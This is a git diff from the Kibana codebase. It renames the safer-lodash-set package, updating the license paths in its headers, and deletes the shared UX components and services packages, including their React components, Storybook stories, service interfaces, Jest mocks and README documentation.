rename to packages/kbn-safer-lodash-set/setWith.js
index aafa8a4db4be6..c957b03e349e0 100644
--- a/packages/elastic-safer-lodash-set/setWith.js
+++ b/packages/kbn-safer-lodash-set/setWith.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 module.exports = require('./lodash/setWith');
diff --git a/packages/elastic-safer-lodash-set/test/fp.ts b/packages/kbn-safer-lodash-set/test/fp.ts
similarity index 98%
rename from packages/elastic-safer-lodash-set/test/fp.ts
rename to packages/kbn-safer-lodash-set/test/fp.ts
index 7a1d6601b5e26..79fda77cbd148 100644
--- a/packages/elastic-safer-lodash-set/test/fp.ts
+++ b/packages/kbn-safer-lodash-set/test/fp.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/fp_assoc.ts b/packages/kbn-safer-lodash-set/test/fp_assoc.ts
similarity index 92%
rename from packages/elastic-safer-lodash-set/test/fp_assoc.ts
rename to packages/kbn-safer-lodash-set/test/fp_assoc.ts
index 8244458cd1180..edc57bc29e8e6 100644
--- a/packages/elastic-safer-lodash-set/test/fp_assoc.ts
+++ b/packages/kbn-safer-lodash-set/test/fp_assoc.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/fp_assocPath.ts b/packages/kbn-safer-lodash-set/test/fp_assocPath.ts
similarity index 93%
rename from packages/elastic-safer-lodash-set/test/fp_assocPath.ts
rename to packages/kbn-safer-lodash-set/test/fp_assocPath.ts
index abbfa57eeb963..1dfb667fd6611 100644
--- a/packages/elastic-safer-lodash-set/test/fp_assocPath.ts
+++ b/packages/kbn-safer-lodash-set/test/fp_assocPath.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/fp_patch_test.js b/packages/kbn-safer-lodash-set/test/fp_patch_test.js
similarity index 99%
rename from packages/elastic-safer-lodash-set/test/fp_patch_test.js
rename to packages/kbn-safer-lodash-set/test/fp_patch_test.js
index 362ecf6f9d866..a7a900bd7601f 100644
--- a/packages/elastic-safer-lodash-set/test/fp_patch_test.js
+++ b/packages/kbn-safer-lodash-set/test/fp_patch_test.js
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 const test = require('tape');
diff --git a/packages/elastic-safer-lodash-set/test/fp_set.ts b/packages/kbn-safer-lodash-set/test/fp_set.ts
similarity index 92%
rename from packages/elastic-safer-lodash-set/test/fp_set.ts
rename to packages/kbn-safer-lodash-set/test/fp_set.ts
index a5dbb24d33a05..b530314b561d9 100644
--- a/packages/elastic-safer-lodash-set/test/fp_set.ts
+++ b/packages/kbn-safer-lodash-set/test/fp_set.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/fp_setWith.ts b/packages/kbn-safer-lodash-set/test/fp_setWith.ts
similarity index 96%
rename from packages/elastic-safer-lodash-set/test/fp_setWith.ts
rename to packages/kbn-safer-lodash-set/test/fp_setWith.ts
index 70a5197f72176..c86c9267e07ec 100644
--- a/packages/elastic-safer-lodash-set/test/fp_setWith.ts
+++ b/packages/kbn-safer-lodash-set/test/fp_setWith.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/index.ts b/packages/kbn-safer-lodash-set/test/index.ts
similarity index 92%
rename from packages/elastic-safer-lodash-set/test/index.ts
rename to packages/kbn-safer-lodash-set/test/index.ts
index 2090c1adcfce1..cbaefb250598c 100644
--- a/packages/elastic-safer-lodash-set/test/index.ts
+++ b/packages/kbn-safer-lodash-set/test/index.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/patch_test.js b/packages/kbn-safer-lodash-set/test/patch_test.js
similarity index 98%
rename from packages/elastic-safer-lodash-set/test/patch_test.js
rename to packages/kbn-safer-lodash-set/test/patch_test.js
index 80a44eb0c5b6b..f83cbe1e40b85 100644
--- a/packages/elastic-safer-lodash-set/test/patch_test.js
+++ b/packages/kbn-safer-lodash-set/test/patch_test.js
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 const test = require('tape');
diff --git a/packages/elastic-safer-lodash-set/test/set.ts b/packages/kbn-safer-lodash-set/test/set.ts
similarity index 84%
rename from packages/elastic-safer-lodash-set/test/set.ts
rename to packages/kbn-safer-lodash-set/test/set.ts
index 9829ac3f04ce5..b07bc407d6a8c 100644
--- a/packages/elastic-safer-lodash-set/test/set.ts
+++ b/packages/kbn-safer-lodash-set/test/set.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/test/setWith.ts b/packages/kbn-safer-lodash-set/test/setWith.ts
similarity index 91%
rename from packages/elastic-safer-lodash-set/test/setWith.ts
rename to packages/kbn-safer-lodash-set/test/setWith.ts
index b3ed93443c4fb..c61aa2d8ec2b1 100644
--- a/packages/elastic-safer-lodash-set/test/setWith.ts
+++ b/packages/kbn-safer-lodash-set/test/setWith.ts
@@ -1,6 +1,6 @@
 /*
  * Elasticsearch B.V licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { expectType } from 'tsd';
diff --git a/packages/elastic-safer-lodash-set/tsconfig.json b/packages/kbn-safer-lodash-set/tsconfig.json
similarity index 100%
rename from packages/elastic-safer-lodash-set/tsconfig.json
rename to packages/kbn-safer-lodash-set/tsconfig.json
diff --git a/packages/kbn-shared-ux-components/README.mdx b/packages/kbn-shared-ux-components/README.mdx deleted file mode 100644 index f4673a0804f31..0000000000000 --- a/packages/kbn-shared-ux-components/README.mdx +++ /dev/null @@ -1,10 +0,0 @@ ---- -id: kibSharedUXComponents -slug: /kibana-dev-docs/shared-ux/packages/kbn-shared-ux-components -title: Shared UX Components -description: -date: 2022-03-11 -tags: ['kibana', 'dev', 'sharedUX'] ---- - -> TODO diff --git a/packages/kbn-shared-ux-components/src/index.ts b/packages/kbn-shared-ux-components/src/index.ts deleted file mode 100644 index 9e11d9341fe59..0000000000000 --- a/packages/kbn-shared-ux-components/src/index.ts +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -// TODO: clintandrewhall - NoDataPageProps is a temporary addition until it is split into its own package -export type { KibanaPageTemplateProps, NoDataPageProps } from './page_template'; - -// TODO: clintandrewhall - NoDataConfigPage is a temporary addition until it is split into its own package -export { KibanaPageTemplate, NoDataConfigPage } from './page_template'; diff --git a/packages/kbn-shared-ux-components/src/page_template/assets/kibana_template_no_data_config.png b/packages/kbn-shared-ux-components/src/page_template/assets/kibana_template_no_data_config.png deleted file mode 100644 index e69de29bb2d1d..0000000000000 
diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/__snapshots__/no_data_config_page.test.tsx.snap b/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/__snapshots__/no_data_config_page.test.tsx.snap deleted file mode 100644 index 047f44e0d319c..0000000000000 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/__snapshots__/no_data_config_page.test.tsx.snap +++ /dev/null @@ -1,31 +0,0 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP - -exports[`NoDataConfigPage renders 1`] = ` - - - -`; diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.tsx b/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.tsx deleted file mode 100644 index 724570d4baccd..0000000000000 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.tsx +++ /dev/null 
@@ -1,95 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { useMemo, FunctionComponent } from 'react'; -import useObservable from 'react-use/lib/useObservable'; -import classNames from 'classnames'; - -import { EuiLink, EuiSpacer, EuiText, EuiTextColor } from '@elastic/eui'; -import { i18n } from '@kbn/i18n'; -import { FormattedMessage } from '@kbn/i18n-react'; -import { KibanaSolutionAvatar } from '@kbn/shared-ux-avatar-solution'; - -import { useSharedUxServices } from '@kbn/shared-ux-services'; -import { NoDataCard, NoDataCardProvider } from '@kbn/shared-ux-card-no-data'; -import { NoDataPageProps } from './types'; - -export const NoDataPage: FunctionComponent = ({ - solution, - logo, - action, - docsLink, - pageTitle, - ...rest -}) => { - const services = useSharedUxServices(); - - // TODO: clintandrewhall - including the `NoDataCardProvider` here is a temporary solution - // to consumers using this context to populate the NoDataPage. This will likely be removed soon, - // when NoDataPage is moved to its own package. - const currentAppId = useObservable(services.application.currentAppId$); - const noDataCardServices = { - currentAppId, - addBasePath: services.http.addBasePath, - canAccessFleet: services.permissions.canAccessFleet, - navigateToUrl: services.application.navigateToUrl, - }; - - const actionKeys = Object.keys(action); - - const actionCard = useMemo(() => { - if (actionKeys.length !== 1) { - return null; - } - const actionKey = actionKeys[0]; - const key = - actionKey === 'elasticAgent' ? 
'empty-page-agent-action' : `empty-page-${actionKey}-action`; - return ; - }, [action, actionKeys]); - - const title = - pageTitle || - i18n.translate('sharedUXComponents.noDataPage.welcomeTitle', { - defaultMessage: 'Welcome to Elastic {solution}!', - values: { solution }, - }); - - return ( -
- - - -

{title}

- -

- - - - ), - }} - /> -

-
-
- - {actionCard} -
- ); -}; diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.stories.tsx b/packages/kbn-shared-ux-components/src/page_template/page_template.stories.tsx deleted file mode 100644 index ae6be1297f018..0000000000000 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.stories.tsx +++ /dev/null 
@@ -1,154 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiButton, EuiText } from '@elastic/eui'; -import { SolutionNavProps } from '@kbn/shared-ux-page-solution-nav'; - -import { KibanaPageTemplate } from './page_template'; -import mdx from './page_template.mdx'; -import { KibanaPageTemplateProps } from './types'; - -export default { - title: 'Page Template/Page Template', - description: - 'A thin wrapper around `EuiTemplate`. Takes care of styling, empty state and no data config', - parameters: { - docs: { - page: mdx, - }, - }, -}; - -type Params = Pick & { - canBeCollapsed: boolean; -}; - -const noDataConfig = { - solution: 'Kibana', - action: { - elasticAgent: {}, - }, - docsLink: 'http://wwww.docs.elastic.co', -}; - -const items: SolutionNavProps['items'] = [ - { - name: 'Ingest', - id: '1', - items: [ - { - name: 'Ingest Node Pipelines', - id: '1.1', - }, - { - name: 'Logstash Pipelines', - id: '1.2', - }, - { - name: 'Beats Central Management', - id: '1.3', - }, - ], - }, - { - name: 'Data', - id: '2', - items: [ - { - name: 'Index Management', - id: '2.1', - }, - { - name: 'Index Lifecycle Policies', - id: '2.2', - }, - { - name: 'Snapshot and Restore', - id: '2.3', - }, - ], - }, -]; - -const solutionNavBar = { - items, - logo: 'logoKibana', - name: 'Kibana', - action: { elasticAgent: {} }, -}; - -const content = ( - -

- Page Content goes here -

-
-); - -const header = { - iconType: 'logoKibana', - pageTitle: 'Kibana', - description: 'Welcome to Kibana!', - rightSideItems: [Add something, Do something], -}; - -export const WithNoDataConfig = () => { - return ; -}; - -export const WithNoDataConfigAndSolutionNav = () => { - return ; -}; - -export const PureComponent = (params: Params) => { - return ( - - {content} - - ); -}; - -PureComponent.argTypes = { - isEmptyState: { - control: 'boolean', - defaultValue: false, - }, - pageHeader: { - control: 'boolean', - defaultValue: true, - }, - solutionNav: { - control: 'boolean', - defaultValue: true, - }, - canBeCollapsed: { - control: 'boolean', - defaultValue: true, - }, -}; - -PureComponent.parameters = { - layout: 'fullscreen', -}; - -WithNoDataConfig.parameters = { - layout: 'fullscreen', -}; - -WithNoDataConfigAndSolutionNav.parameters = { - layout: 'fullscreen', -}; diff --git a/packages/kbn-shared-ux-services/README.mdx b/packages/kbn-shared-ux-services/README.mdx deleted file mode 100755 index 589aae4cc7ed2..0000000000000 --- a/packages/kbn-shared-ux-services/README.mdx +++ /dev/null 
@@ -1,203 +0,0 @@ ---- -id: kibSharedUXServices -slug: /kibana-dev-docs/shared-ux/packages/kbn-shared-ux-services -title: Shared UX Services -description: The `@kbn/shared-ux-services` package provides a thin service abstraction for components and solutions created by the Shared UX team. -date: 2022-03-11 -tags: ['kibana', 'dev', 'sharedUX'] ---- - -## About Shared UX Services - -This package contains a set of services that are used by Shared UX components and solutions. This package serves as a thin abstraction layer between Kibana dependencies and the components in Shared UX that use them. It also allows us to "swap out" different implementations of the interfaces for different environments, (e.g. Storybook, Jest, etc). This decouples the components from what could be complicated or heavily-dependent logic that is difficult to mock. - -## Implementations - -Several implementations of these interfaces exist: - -- `@kbn/shared-ux-services/src/services/stub`: A stub implementation free of dependencies, (and functionality). -- `@kbn/shared-ux-services/src/services/mock`: A Jest mock implementation used in `jest` tests. -- `@kbn/shared-ux-storybook/src/services/`: A Storybook implementation used in Storybook decorators and stories. -- `src/plugins/shared_ux/src/services/`: A Kibana implementation used in Kibana plugins. - -Other implementations could easily be written to support other environments. - -## Architecture - -Lots of components require access to the services provided by other plugins. When we identify a routine that relies on these dependencies, we can write a new method and add it to a namespace, (e.g. `platform`, `user`, etc). These namespaces become interfaces of simple methods stored in `@kbn/shared-ux-services`. From there, we can create implementations for each environment we support. 
- -Suppose we're creating a new service, `SharedUxFooService`: - -```ts -interface SharedUxFooService { - getFoo(): string; - setBar(bar: string): void; - isBaz(): boolean; -} -``` - -Once defined, we create factories to create those services. - -### Creating a `ServiceFactory` - -A `ServiceFactory` is a simple type that describes 1/ what service is being created, and 2/ what parameters are required to create that service for a given environment. - -### Stub and Mock Factories - -Given the service definition above, we can create a `ServiceFactory` for a stubbed service that gives the bare minimum of functionality: - -```ts -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export type FooServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = () => ({ - getFoo: () => 'foo', - setBar: () => {}, - isBaz: () => false, -}); -``` - -We can also create a mock for Jest: - -```ts -/** - * A factory function for creating a mock implementation of `SharedUxFooService`. - */ -export type FooServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = () => ({ - getFoo: () => jest.fn(), - setBar: () => jest.fn(), - isBaz: () => jest.fn(), -}); -``` - -### Storybook Factories - -Storybook is where we can begin to take advantage of `Parameters` for a given service. Since stories can use controls to provide parameters, we can create a `ServiceFactory` that uses the `Parameters` generic and returns a `SharedUxFooService` that uses their values. - -```ts -import { action } from '@storybook/addon-actions'; - -interface FooServiceStorybookParameters { - foo: string; - baz: boolean; -} - -/** - * A factory function for creating a Storybook implementation of `SharedUxFooService`. 
- */ -export type FooServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = ({ foo, baz }) => ({ - getFoo: () => foo, - setBar: () => action('setBar'), - isBaz: () => baz, -}); -``` - -A story can then optionally provide values for those parameters as part of its controls. - -```ts -type Params = Pick; - -export const ComponentStory = ({ foo }: Params) => { - const service = fooServiceFactory({ foo, baz: false }); - - return ( - ; -}; - -PureComponent.argTypes = { - foo: { - options: ['alpha', 'beta', 'gamma', 'delta'], - control: { type: 'radio' }, - }, -}; -``` - -### Kibana Factories - -Using these services in Kibana is a bit more complex, but is still relatively simple. First, we define what dependencies we'll need, (we use this interface in `src/plugins/shared_ux` as it relies on types found only in plugins, where packages cannot use them): - -```ts -/** - * Parameters necessary to create a Kibana-based service, (e.g. during Plugin - * startup or setup). - * - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export interface KibanaPluginServiceParams { - coreStart: CoreStart; - startPlugins: Start; - appUpdater?: BehaviorSubject; - initContext?: PluginInitializerContext; -} - -/** - * A factory function for creating a Kibana-based service. - * - * The `Service` generic determines the shape of the Service being produced. - * The `Start` generic refers to the specific Plugin `TPluginsStart`. 
- */ -export type KibanaPluginServiceFactory = ( - params: KibanaPluginServiceParams -) => Service; -``` - -From there, a plugin might have a collection of dependencies on core or other plugins: - -```ts -export interface MyPluginStartDeps { - bar: BarPluginStart; - baz: BazPluginStart; -} -``` - -We'd then use this dependency interface to create a `ServiceFactory` for our service in Kibana: - -```ts -export type FooServiceFactory = KibanaPluginServiceFactory< - SharedUxFooService, - MyPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = ({ coreStart, startPlugins }) => ({ - getFoo: startPlugins.bar.getSomeOtherFoo, - setBar: startPlugins.baz.setHappyPathBar, - isBaz: () => { - return coreStart.uiSettings.get('someSetting') === 'expectedValue'; - } -}); -``` - -From there, the pattern is the same: invoke the service factory with the required dependencies and provide them to the `SharedUxServicesContext` Provider: - -```ts - -// plugin.tsx -public start(coreStart: CoreStart, startPlugins: SharedUXPluginStartDeps): SharedUXPluginStart { - const fooService = fooServiceFactory({ coreStart, startPlugins }); - const Context = {children}; - - // ...wrap React content with the context.. -} -``` - -## Use in Kibana plugins - -In order to make consumption of these services easy by Kibana plugins, `src/plugins/shared_ux` provides a pre-wired set of services as part of the `start` lifecycle. Plugins can simply make `sharedUX` a dependency, import `SharedUxServicesProvider` and wrap their solution root (or any component). See the documentation for `sharedUX` for more details. diff --git a/packages/kbn-shared-ux-services/src/context.tsx b/packages/kbn-shared-ux-services/src/context.tsx deleted file mode 100644 index 6131c23e27370..0000000000000 --- a/packages/kbn-shared-ux-services/src/context.tsx +++ /dev/null 
@@ -1,70 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC, createContext, useContext } from 'react'; - -import type { SharedUxServices } from './types'; - -// The React Context used to provide the services to the SharedUX components. -const SharedUxServicesContext = createContext(null); - -/** - * The `React.Context` Provider component for the `SharedUxServices` context. Any - * plugin or environment that consumes SharedUX components needs to wrap their React - * tree with this provider. - * - * Within a plugin, you can use use the Shared UX plugin and retrieve a fully-configured - * context from the `start` contract. - */ -export const SharedUxServicesProvider: FC = ({ children, ...services }) => ( - {children} -); - -/** - * React hook for accessing pre-wired `SharedUxServices`. - */ -export function useSharedUxServices() { - const context = useContext(SharedUxServicesContext); - - if (!context) { - throw new Error( - 'SharedUxServicesContext missing. Ensure your component or React root is wrapped with SharedUxServicesProvider.' - ); - } - - return context; -} - -/** - * React hook for accessing the pre-wired `SharedUxPlatformService`. - */ -export const usePlatformService = () => useSharedUxServices().platform; - -/** - * React hook for accessing the pre-wired `SharedUxPermissionsService`. - */ -export const usePermissions = () => useSharedUxServices().permissions; - -/** - * React hook for accessing the pre-wired `SharedUxEditorsService`. - */ -export const useEditors = () => useSharedUxServices().editors; - -/** - * React hook for accessing the pre-wired `SharedUxDocLinksService`. 
- */ -export const useDocLinks = () => useSharedUxServices().docLinks; - -export const useHttp = () => useSharedUxServices().http; - -export const useApplication = () => useSharedUxServices().application; - -/** - * React hook for accessing the pre-wired `SharedUxDataService`. - */ -export const useData = () => useSharedUxServices().data; diff --git a/packages/kbn-shared-ux-services/src/index.ts b/packages/kbn-shared-ux-services/src/index.ts deleted file mode 100755 index 47f9d61ff88ac..0000000000000 --- a/packages/kbn-shared-ux-services/src/index.ts +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export type { ServiceFactory, SharedUxServices, SharedUxServicesContext } from './types'; -export type { - MockServicesFactoryParams, - SharedUxApplicationService, - SharedUxDocLinksService, - SharedUxEditorsService, - SharedUxHttpService, - SharedUxPlatformService, - SharedUxUserPermissionsService, - SharedUxDataService, -} from './services'; - -export { - SharedUxServicesProvider, - useApplication, - useDocLinks, - useEditors, - useHttp, - usePermissions, - usePlatformService, - useData, - useSharedUxServices, -} from './context'; - -export { - mockServiceFactories, - mockServicesFactory, - stubServiceFactories, - stubServicesFactory, -} from './services'; diff --git a/packages/kbn-shared-ux-services/src/services/application.ts b/packages/kbn-shared-ux-services/src/services/application.ts deleted file mode 100644 index 89a7fa91fadc5..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/application.ts +++ /dev/null 
@@ -1,14 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Observable } from 'rxjs'; - -export interface SharedUxApplicationService { - navigateToUrl: (url: string) => Promise | void; - currentAppId$: Observable; -} diff --git a/packages/kbn-shared-ux-services/src/services/data.ts b/packages/kbn-shared-ux-services/src/services/data.ts deleted file mode 100644 index 2750c9bd32085..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/data.ts +++ /dev/null @@ -1,19 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing data information. Typically used for handling of empty state.. - */ -export interface SharedUxDataService { - /** True if the cluster contains data, false otherwise. */ - hasESData: () => Promise; - /** True if Kibana instance contains user-created data view, false otherwise. */ - hasUserDataView: () => Promise; - /** True if Kibana instance contains any data view, including system-created ones. */ - hasDataView: () => Promise; -} diff --git a/packages/kbn-shared-ux-services/src/services/doc_links.ts b/packages/kbn-shared-ux-services/src/services/doc_links.ts deleted file mode 100644 index 3b8eb4748d76f..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/doc_links.ts +++ /dev/null 
@@ -1,15 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing links to documentation about various features in Kibana. - */ -export interface SharedUxDocLinksService { - /** A link to information about Data Views in Kibana */ - dataViewsDocLink: string; -} diff --git a/packages/kbn-shared-ux-services/src/services/editors.ts b/packages/kbn-shared-ux-services/src/services/editors.ts deleted file mode 100644 index 4dc5b7d9bc269..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/editors.ts +++ /dev/null 
@@ -1,36 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * TODO: `DataView` is a class exported by `src/plugins/data_views/public`. Since this service - * is contained in this package-- and packages can only depend on other packages and never on - * plugins-- we have to set this to `unknown`. If and when `DataView` is exported from a - * stateless package, we can remove this. - * - * @see: https://github.com/elastic/kibana/issues/127695 - */ -type DataView = unknown; - -/** - * A subset of the `DataViewEditorOptions` interface relevant to our service and components. - * - * @see: src/plugins/data_view_editor/public/types.ts - */ -interface DataViewEditorOptions { - /** Handler to be invoked when the Data View Editor completes a save operation. */ - onSave: (dataView: DataView) => void; -} - -/** - * A service providing methods to invoke and interact with various editors provided - * in Kibana. - */ -export interface SharedUxEditorsService { - /** A method to open the Data View Editor flow. */ - openDataViewEditor: (options: DataViewEditorOptions) => () => void; -} diff --git a/packages/kbn-shared-ux-services/src/services/index.ts b/packages/kbn-shared-ux-services/src/services/index.ts deleted file mode 100644 index 0e4e4e473028d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/index.ts +++ /dev/null 
@@ -1,21 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export type { SharedUxApplicationService } from './application'; -export type { SharedUxDocLinksService } from './doc_links'; -export type { SharedUxEditorsService } from './editors'; -export type { SharedUxHttpService } from './http'; -export type { SharedUxUserPermissionsService } from './permissions'; -export type { SharedUxPlatformService } from './platform'; -export type { SharedUxDataService } from './data'; -export type { MockServicesFactoryParams } from './mock'; - -// eslint-disable-next-line @kbn/imports/no_boundary_crossing -export { mockServicesFactory, mockServiceFactories } from './mock'; -// eslint-disable-next-line @kbn/imports/no_boundary_crossing -export { stubServicesFactory, stubServiceFactories } from './stub'; diff --git a/packages/kbn-shared-ux-services/src/services/mock/application.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/application.mock.ts deleted file mode 100644 index 947113c4a3168..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/application.mock.ts +++ /dev/null 
@@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Observable } from 'rxjs'; -import { ServiceFactory } from '../../types'; -import { SharedUxApplicationService } from '../application'; - -export type MockApplicationServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUXApplicationService`. - */ -export const applicationServiceFactory: MockApplicationServiceFactory = () => ({ - navigateToUrl: () => Promise.resolve(), - currentAppId$: new Observable((subscriber) => { - subscriber.next('abc123'); - }), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/data.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/data.mock.ts deleted file mode 100644 index bb9d59643348d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/data.mock.ts +++ /dev/null 
@@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory } from '../../types'; -import { SharedUxDataService } from '../data'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxDataService`. - */ -export type MockDataServiceFactory = ServiceFactory; - -export interface MockDataServiceFactoryConfig { - hasESData: boolean; - hasDataView: boolean; - hasUserDataView: boolean; -} - -/** - * A factory function for creating a Jest-based implementation of `SharedUxDataService`. - */ -export const dataServiceFactory: (config?: MockDataServiceFactoryConfig) => SharedUxDataService = ( - config?: MockDataServiceFactoryConfig -) => ({ - hasESData: () => Promise.resolve(config?.hasESData || false), - hasDataView: () => Promise.resolve(config?.hasDataView || false), - hasUserDataView: () => 